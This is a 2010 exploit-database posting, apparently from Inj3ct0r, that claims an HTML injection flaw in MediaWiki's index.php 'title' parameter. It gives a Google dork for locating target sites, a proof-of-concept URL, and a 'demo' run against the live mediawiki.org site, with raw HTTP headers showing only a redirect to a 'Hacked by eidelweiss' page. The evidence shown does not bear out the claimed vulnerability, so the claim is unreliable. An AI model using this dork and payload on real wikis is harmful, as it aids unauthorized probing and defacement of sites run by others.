Mediawiki (index.php) HTML Injection & unknown vulnerabi
Posted on 01 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Mediawiki (index.php) HTML Injection & unknown vulnerability issue</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================================================== Mediawiki (index.php) HTML Injection & unknown vulnerability issue =================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Vendor: www.MEDIAWIKI.ORG download: http://www.mediawiki.org/wiki/Download Author: eidelweiss Contact: g1xsystem[at]windowslive.com Thank`s: neogabriel a.k.a Ahmed Yusuf (who have give me inspiration for this exploit) Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 result (0.18 second) ===================================================================== Description: You can read all Description about mediawiki in www.mediawiki.org :P ===================================================================== -=[ vuln ]=- http://127.0.0.1/wiki/index.php?title=XSS -=[ P0C ]=- http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss -=[ vendor Demo P0C ]=- http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss redirect to http://www.mediawiki.org/wiki/Hacked_by_eidelweiss Host=www.mediawiki.org User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-us,en;q=0.5 Accept-Encoding=gzip,deflate Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive=115 Connection=keep-alive Status=Moved Permanently - 301 Date=Tue, 01 Jun 2010 09:11:42 GMT Server=Apache Cache-Control=private, s-maxage=0, max-age=0, must-revalidate Vary=Accept-Encoding,Cookie Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss Content-Encoding=gzip Content-Length=20 Content-Type=text/html; charset=utf-8 X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80 =========================| -=[ E0F ]=- |========================= # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
